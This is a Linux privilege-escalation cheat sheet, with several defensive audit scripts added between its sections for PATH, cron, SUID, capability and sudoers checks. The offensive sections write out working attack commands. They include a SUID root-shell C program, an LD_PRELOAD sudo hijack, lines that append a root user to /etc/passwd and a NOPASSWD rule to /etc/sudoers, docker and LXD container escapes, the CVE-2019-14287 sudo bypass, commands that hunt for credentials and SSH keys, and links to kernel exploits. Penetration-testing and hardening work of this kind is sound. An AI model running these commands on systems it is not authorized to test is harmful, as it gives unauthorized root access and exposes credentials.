Privilege escalation - Linux

Privilege escalation is the post-exploitation step in which an attacker raises their access from a low-privileged account to a higher one, usually root. This guide focuses on practical techniques and commands for identifying and exploiting privilege escalation vulnerabilities on Linux: tooling, locating sensitive information, abusing misconfigurations, and using kernel vulnerabilities. Each method comes with the corresponding commands so it can be applied directly.


Tools

These tools are essential for finding and exploiting privilege escalation vulnerabilities:

  • LinPEAS: Privilege Escalation auditing script.

    wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
    chmod +x linpeas.sh
    ./linpeas.sh
  • Linux Exploit Suggester: Suggests potential exploits based on system vulnerabilities.

    wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
    chmod +x linux-exploit-suggester.sh
    ./linux-exploit-suggester.sh
  • Pspy: Monitors processes without root access.

    wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
    chmod +x pspy64
    ./pspy64

Checklist

System information:

  • Gather system information:

    uname -a
    cat /etc/*release
    id
  • Check running processes:

    ps aux
  • Check kernel version (the Kernel Exploits section below builds on it):

    uname -r
  • List users on the system:

    cat /etc/passwd
  • Check available shell history:

    cat ~/.bash_history

PATH Variable & Writable Folders

  • Check if any folder in the PATH is writable:

    echo $PATH
    for d in $(echo "$PATH" | tr ":" " "); do [ -w "$d" ] && echo "writable: $d"; done
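A fuller version of the PATH check, written for this page as an added example (it is not part of the original cheat sheet): besides directories the current user can write to, it reports empty or relative entries, entries that do not exist, and world-writable directories, each of which lets someone plant a binary that gets found before the real one. It assumes a POSIX sh and a find that understands -prune and -perm (GNU and BSD both do); the function name and finding labels are my own.

```shell
#!/bin/sh
# path_audit: report PATH entries an unprivileged user could abuse.
# Added example (not from the original page). Usage: path_audit "$PATH"
# Findings, one per line:
#   RELATIVE        empty, "." or any other relative entry (the current directory gets searched)
#   MISSING         directory does not exist (whoever owns the parent can create it)
#   WRITABLE        the current user can write into it
#   WORLD-WRITABLE  the other-write bit is set (risky for every user on the box)
path_audit() {
    _seen=""
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r d; do
        case "$d" in
            /*) ;;
            *)  printf 'RELATIVE %s\n' "${d:-<empty>}"; continue ;;
        esac
        case ":$_seen:" in *":$d:"*) continue ;; esac   # report each directory once
        _seen="$_seen:$d"
        if [ ! -d "$d" ]; then printf 'MISSING %s\n' "$d"; continue; fi
        [ -w "$d" ] && printf 'WRITABLE %s\n' "$d"
        # -prune stops find from descending; -perm -002 tests the other-write bit
        if find "$d" -prune -perm -002 2>/dev/null | grep -q .; then
            printf 'WORLD-WRITABLE %s\n' "$d"
        fi
    done
    return 0
}

path_audit "$PATH"
```

On a hardened host the expected output is empty; any RELATIVE or WORLD-WRITABLE line is worth fixing regardless of who runs the check, since cron jobs and sudo rules inherit PATH too.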

Environment Variables

  • Check environment variables for sensitive information:

    env

Kernel Exploits

  • Run an exploit-suggester script against the kernel version (it flags candidates such as DirtyCow):

    ./linux-exploit-suggester.sh
  • Check for specific kernel exploits like DirtyCow:

    https://github.com/dirtycow/dirtycow.github.io
  • Check if the sudo version is vulnerable:

    sudo -V

Dmesg: Signature Verification Failed

Look for kernel errors or issues related to signature verification (unprivileged reads fail when kernel.dmesg_restrict is set to 1):

dmesg | grep -i signature

More System Enumeration

Check System Information (Date, System Stats, CPU Info)

  • Date and Time: (Helps you synchronize your actions with scheduled jobs or detect potential time-based misconfigurations)

    date
  • CPU info: (Identifies the system architecture to tailor exploits to the specific processor type)

    cat /proc/cpuinfo
  • Check for printers: (Identifies networked printers, which could be exploited for lateral movement or sensitive data interception)

    lpstat -p
  • Check for writable files:

    find / -writable -type f 2>/dev/null

Looting for Passwords

Files Containing Passwords

Common files where passwords are stored:

grep -ri "password" /etc 2>/dev/null

Old Passwords in /etc/security/opasswd

cat /etc/security/opasswd

Last Edited Files

find / -type f -printf '%TY-%Tm-%Td %TT %p\n' 2>/dev/null | sort -r | head

In-Memory Passwords

Dump memory to search for passwords (requires root; on kernels built with CONFIG_STRICT_DEVMEM, the default on most distributions, /dev/mem exposes only PCI and BIOS regions rather than system RAM, so this rarely yields anything):

strings /dev/mem | grep -i password

Find Sensitive Files

SSH Key

Search for SSH keys on the system:

find / -name "id_rsa" 2>/dev/null


Scheduled Tasks

Cron Jobs

Check cron jobs:

cat /etc/crontab
ls -la /etc/cron.*
ls -la /var/spool/cron/crontabs

If you find a writable cron job, you can inject your own commands.
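The check that matters on the defensive side is whether any scheduled command can be tampered with by a non-root user. The function below is an added example written for this page, not something from the original sheet: it parses system-style crontab lines (the ones with a user field, as in /etc/crontab and /etc/cron.d/*), pulls out each command path, and reports commands given without an absolute path, world-writable scripts, and scripts sitting in world-writable, non-sticky directories. It assumes POSIX sh, awk and find; the function name and labels are my own.

```shell
#!/bin/sh
# cron_writable_cmds: read a system-style crontab (with the user field) on stdin
# and report scheduled commands a non-root user could tamper with.
# Added example, not from the original page.
# Usage: cat /etc/crontab /etc/cron.d/* 2>/dev/null | cron_writable_cmds
# Findings:
#   RELATIVE  command given without an absolute path (resolved through cron's PATH)
#   WW-FILE   the script/binary itself is world-writable
#   WW-DIR    its directory is world-writable and not sticky (the file can be replaced)
cron_writable_cmds() {
    awk '/^[ \t]*#/ || /^[ \t]*$/ || /^[A-Za-z_][A-Za-z0-9_]*=/ { next }   # comments, blanks, VAR=value
         $1 ~ /^@/  { print $3; next }                                    # @reboot user cmd
         NF >= 7    { print $7 }' |                                       # m h dom mon dow user cmd
    sort -u |
    while IFS= read -r cmd; do
        case "$cmd" in
            /*) ;;
            *)  printf 'RELATIVE  %s\n' "$cmd"; continue ;;
        esac
        if [ -e "$cmd" ] && find "$cmd" -prune -perm -002 2>/dev/null | grep -q .; then
            printf 'WW-FILE   %s\n' "$cmd"
        fi
        dir=${cmd%/*}; [ -n "$dir" ] || dir=/
        # -perm -1000 is the sticky bit: in a sticky dir only the owner can replace the file
        if [ -d "$dir" ] && find "$dir" -prune -perm -002 ! -perm -1000 2>/dev/null | grep -q .; then
            printf 'WW-DIR    %s\n' "$dir"
        fi
    done
    return 0
}
```

Per-user crontabs under /var/spool/cron/crontabs have no user field; feed those through the same function after inserting a dummy user column (for example with awk) if you want to reuse it.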

Systemd Timers

List systemd timers that could be manipulated:

systemctl list-timers

SUID

Find SUID Binaries (https://gtfobins.github.io/)

SUID binaries run with elevated privileges:

find / -perm -4000 -type f 2>/dev/null
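The same find command is also the basis of a simple integrity control: snapshot the SUID inventory on a known-good host and diff it later. The function below is an added example written for this page (not from the original), assuming POSIX sort and comm; it reports binaries that gained or lost the SUID bit and additionally marks new entries whose name is a shell, interpreter or editor, since those should never be SUID on a production system. Function name, labels and watchlist are my own.

```shell
#!/bin/sh
# suid_diff: compare a saved SUID inventory with a fresh one and report changes.
# Added example, not from the original page. Assumes POSIX sort/comm.
# Build the baseline on a known-good host, then diff periodically:
#   find / -perm -4000 -type f 2>/dev/null | sort > suid-baseline.txt
#   find / -perm -4000 -type f 2>/dev/null | sort > suid-now.txt
#   suid_diff suid-baseline.txt suid-now.txt
suid_diff() {
    _base=$(mktemp); _now=$(mktemp)
    sort -u "$1" > "$_base"
    sort -u "$2" > "$_now"
    # comm -13: lines only in the second file (new SUID binaries)
    comm -13 "$_base" "$_now" | while IFS= read -r p; do
        printf 'NEW     %s\n' "$p"
        # shells, interpreters and editors should never carry the SUID bit
        case "${p##*/}" in
            sh|bash|dash|zsh|python*|perl|ruby|vim|vi|nano|find)
                printf 'WATCH   %s\n' "$p" ;;
        esac
    done
    # comm -23: lines only in the baseline (SUID bit removed or file gone)
    comm -23 "$_base" "$_now" | sed 's/^/REMOVED /'
    rm -f "$_base" "$_now"
}
```

Run it from cron and alert on any NEW line; a WATCH line in particular is almost always either a misconfiguration or a planted backdoor.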

Create a SUID Binary

If you can create a SUID binary, you can escalate privileges:

#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid() */

int main(void) {
    setuid(0);              /* only takes effect if the file is root-owned and SUID */
    system("/bin/bash");
    return 0;
}

Compile and set the SUID bit (the bit only grants root if the file is owned by root):

gcc -o suid_binary suid_binary.c
chmod +s suid_binary

Capabilities

List Capabilities of Binaries

Linux capabilities allow binaries to perform privileged operations:

getcap -r / 2>/dev/null

Edit Capabilities

If you find writable binaries with capabilities:

setcap cap_setuid+ep /path/to/binary

Interesting Capabilities

Look for binaries with capabilities like cap_setuid, cap_dac_override, or cap_sys_admin that can help escalate privileges.
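To turn that advice into a repeatable check, the function below (an added example for this page, not from the original) reads getcap -r output on stdin and prints one line per binary and dangerous capability. It handles both output styles getcap has used: "/path = cap_x+ep" on older libcap and "/path cap_x=ep" on libcap 2.41 and later. The capability list is the page's three plus a few others that are equally root-equivalent; the function name and HIGH label are my own.

```shell
#!/bin/sh
# cap_audit: read `getcap -r / 2>/dev/null` output on stdin and flag binaries
# whose file capabilities amount to root. Added example, not from the original page.
# Handles both getcap output styles:
#   /usr/bin/foo = cap_setuid+ep     (libcap before 2.41)
#   /usr/bin/foo cap_setuid=ep       (libcap 2.41 and later)
# Usage: getcap -r / 2>/dev/null | cap_audit
cap_audit() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        path=${line%% *}          # text up to the first space
        caps=${line#"$path"}      # remainder: " = cap..." or " cap..."
        caps=${caps# = }
        caps=${caps# }
        # capabilities that let a process change its uid or bypass DAC / the kernel
        for c in cap_setuid cap_setgid cap_dac_override cap_dac_read_search \
                 cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown; do
            # leading comma so each name is matched as a whole list element
            case ",$caps" in
                *",$c"*) printf 'HIGH %s %s\n' "$c" "$path" ;;
            esac
        done
    done
    return 0
}

# Constructed sample lines (not real system output) so the block runs offline:
printf '%s\n' '/usr/bin/ping = cap_net_raw+ep' '/usr/bin/python3 cap_setuid=ep' | cap_audit
```

cap_net_raw on ping is the normal case and is deliberately not reported; anything that does print should be compared with the package that installed the file.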


SUDO

NOPASSWD

Look for sudo privileges without requiring a password:

sudo -l

LD_PRELOAD and NOPASSWD

Use LD_PRELOAD to hijack a command you are allowed to run with sudo; this only works when sudoers keeps the variable (Defaults env_keep += LD_PRELOAD, which shows up in the sudo -l output):

echo 'int getuid() {return 0;}' > preload.c
gcc -shared -o preload.so preload.c -fPIC
sudo LD_PRELOAD=./preload.so /path/to/command
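The NOPASSWD and LD_PRELOAD sections above both come down to sudoers settings, so one audit function covers them. The block below is an added example for this page, not from the original: it reads sudoers content on stdin and flags NOPASSWD rules, env_keep entries that preserve LD_PRELOAD or LD_LIBRARY_PATH, disabled env_reset, unrestricted "ALL" grants to anyone other than root, and include directives (which point at further files to audit). It assumes POSIX sh; the finding labels are my own.

```shell
#!/bin/sh
# sudoers_audit: scan sudoers content on stdin and flag settings that turn a sudo
# rule into a root shell. Added example, not from the original page.
# Usage (needs root to read the files):
#   cat /etc/sudoers /etc/sudoers.d/* 2>/dev/null | sudoers_audit
sudoers_audit() {
    while IFS= read -r line; do
        case "$line" in
            '#include'*|'#includedir'*|'@include'*|'@includedir'*)
                printf 'INCLUDE       %s\n' "$line"; continue ;;   # directive, not a comment
            ''|'#'*) continue ;;
        esac
        case "$line" in *NOPASSWD*)
            printf 'NOPASSWD      %s\n' "$line" ;; esac
        case "$line" in *env_keep*LD_PRELOAD*|*env_keep*LD_LIBRARY_PATH*)
            printf 'ENV_KEEP_LD   %s\n' "$line" ;; esac          # makes the LD_PRELOAD trick possible
        case "$line" in *'!env_reset'*)
            printf 'NO_ENV_RESET  %s\n' "$line" ;; esac          # caller's environment passes through
        case "$line" in
            root*|Defaults*|*_Alias*) ;;                          # root and alias/option lines are expected
            *'=('*')'*' ALL')                                     # "<who> ALL=(ALL) ... ALL": every command
                printf 'ALL_CMDS      %s\n' "$line" ;;
        esac
    done
    return 0
}

# Constructed sample (not a real sudoers file) so the block runs offline:
printf '%s\n' 'Defaults env_keep += "LD_PRELOAD"' 'bob ALL=(ALL) NOPASSWD: ALL' | sudoers_audit
```

An ENV_KEEP_LD finding is the precondition for the LD_PRELOAD technique above; removing the env_keep entry (sudo's default env_reset already strips LD_* variables) closes it.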

Doas

Doas is an alternative to sudo. Check if it's configured:

doas -s

Writable Files

Writable /etc/passwd

If /etc/passwd is writable, you can modify it to create a new user:

echo 'hacker:x:0:0:hacker:/root:/bin/bash' >> /etc/passwd

Writable /etc/sudoers

If writable, add a new sudo rule:

echo 'hacker ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers

NFS Root Squashing

If root squashing is disabled, mount the NFS share and escalate privileges:

mount -o rw,vers=3 nfs_server:/share /mnt

Shared Library Exploits

ldconfig

List the library search paths and cache that ldconfig uses; a writable directory in this list (or in /etc/ld.so.conf.d) is the risk:

ldconfig -p

RPATH

RPATH allows binaries to specify search paths for libraries. If vulnerable, this can be exploited by injecting malicious libraries.


Docker and LXC/LXD

Docker

If the user is part of the docker group, they can escalate privileges:

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

LXC/LXD

Exploit LXD by importing an image:

lxc image import ./rootfs.tar.xz --alias privesc
lxc init privesc privesc-container -c security.privileged=true
lxc start privesc-container
lxc exec privesc-container /bin/sh

Hijack TMUX Session

If a TMUX session is running as root, hijack it:

tmux ls
tmux attach -t <session-id>

Kernel Exploits

CVE-2022-0847 (DirtyPipe)

Exploit DirtyPipe for privilege escalation:

https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit

CVE-2016-5195 (DirtyCow)

Exploit DirtyCow for privilege escalation:

https://github.com/dirtycow/dirtycow.github.io

CVE-2010-3904 (RDS)

RDS socket vulnerability:

https://www.exploit-db.com/exploits/15285

CVE-2010-4258 (Full Nelson)

Full Nelson exploit for privilege escalation:

https://www.exploit-db.com/exploits/15704

CVE-2019-14287

This works against sudo versions before 1.8.28 when a sudoers rule lets the user run commands as any user except root (ALL, !root); passing uid -1 bypasses that restriction:

sudo -u#-1 /bin/bash

CVE-2012-0056 (Mempodipper)

Mempodipper is a kernel exploit for privilege escalation:

https://www.exploit-db.com/exploits/18411
